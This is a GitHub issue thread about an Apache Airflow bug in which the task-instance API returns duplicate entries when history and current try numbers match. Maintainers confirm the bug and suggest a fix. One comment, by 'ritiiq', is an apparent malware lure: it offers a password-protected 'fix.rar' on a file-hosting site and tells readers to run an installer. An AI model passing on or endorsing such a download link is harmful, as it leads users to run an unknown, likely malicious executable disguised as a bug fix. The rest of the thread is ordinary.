### ISSUE TITLE
Duplicate entries in API response when TaskInstanceHistory and TaskInstance have same maximum try number

### ISSUE THREAD

**Issue by tirkarthi** [apache/airflow#41765]
### Apache Airflow version

main (development)

### What happened?

While trying out a task with high number of retries I noticed the issue where there are duplicate entries for task tries sometimes but eventually resolves it by itself. I noticed the following query where TaskInstanceHistory and TaskInstance entry is combined. There could be a case where the max try_number of TaskInstanceHistory  entries and TaskInstance's try_number are the same thus leading to the duplicate entries in the latest try.

https://github.com/apache/airflow/blob/79db243d03cc4406290597ad400ab0f514975c79/airflow/api_connexion/endpoints/task_instance_endpoint.py#L863-L872

### How to reproduce

1. Setup a dag with high number of retries.
2. Notice occassionally the below scenario during API calls with duplicate response for the last try number.

![image](https://github.com/user-attachments/assets/4d276275-5331-476f-9261-eb842c67f719)

### Operating System

Ubuntu

### Deployment

Virtualenv installation

### Are you willing to submit PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by tirkarthi** [comment]
cc: @ephraimbuddy  @bbovenzi

**Comment by bbovenzi** [comment]
Ahh this makes sense. I think when try_number is the same, we should only send the TI entry. and ignore the TIH entry.

**Comment by zachliu** [comment]
Both 2.10.2 and 2.10.3 have this issue

![2024-11-08_14-29_2](https://github.com/user-attachments/assets/0408c63b-ade2-4a12-a8d0-0b83ae1a2015)

**Comment by potiuk** [comment]
Yeah I saw that one too during the Man's Hackathon.
